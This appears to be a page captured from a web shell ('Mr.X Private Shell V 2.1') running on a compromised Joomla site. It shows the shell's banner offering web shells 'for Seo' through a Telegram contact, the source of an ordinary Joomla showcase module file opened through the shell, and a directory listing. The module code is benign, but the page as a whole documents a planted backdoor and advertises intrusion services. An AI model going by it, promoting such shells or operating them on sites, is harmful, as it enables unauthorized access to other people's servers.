__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
*
* @version See field version manifest file
* @package See field name manifest file
* @author Gregorio Nuti
* @copyright See field copyright manifest file
* @license GNU General Public License version 2 or later
*
*/
// no direct access
defined('_JEXEC') or die;
// define ds variable for joomla 3 compatibility
if(!defined('DS')) define('DS', DIRECTORY_SEPARATOR);
// namespaces
use Joomla\CMS\Uri\Uri;
use Joomla\CMS\Factory;
// include jquery
if (version_compare(JVERSION, "4.0.0", ">=")) {
$wa = Factory::getApplication()->getDocument()->getWebAssetManager();
$wa->useScript('jquery');
} else {
JHtml::_('jquery.framework', false);
}
// include module helper
if (file_exists(dirname(__FILE__).DS.'override'.DS.'helper.php')) {
require_once dirname(__FILE__).DS.'override'.DS.'helper.php';
} else {
require_once dirname(__FILE__).DS.'helper.php';
}
// include module variables
require 'modules'.DS.'mod_digi_showcase'.DS.'include'.DS.'variables.php';
// add bootstrap framework before any javascript library
if (file_exists(JPATH_BASE."/media/jui/js/bootstrap.min.js")) {
JHtml::_('bootstrap.framework');
}
// add style files
$document->addStyleSheet(URI::root().'modules/mod_digi_showcase/assets/css/style.css');
// include layout
require JModuleHelper::getLayoutPath('mod_digi_showcase', $params->get('layout', 'default'));
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0775 |
|
|
| extras | Folder | 0775 |
|
|
| images | Folder | 0775 |
|
|
| include | Folder | 0775 |
|
|
| tmpl | Folder | 0775 |
|
|
| helper.php | File | 47.97 KB | 0664 |
|
| mod_digi_showcase.php | File | 1.38 KB | 0664 |
|
| mod_digi_showcase.xml | File | 52.08 KB | 0664 |
|
| script.php | File | 3.11 KB | 0664 |
|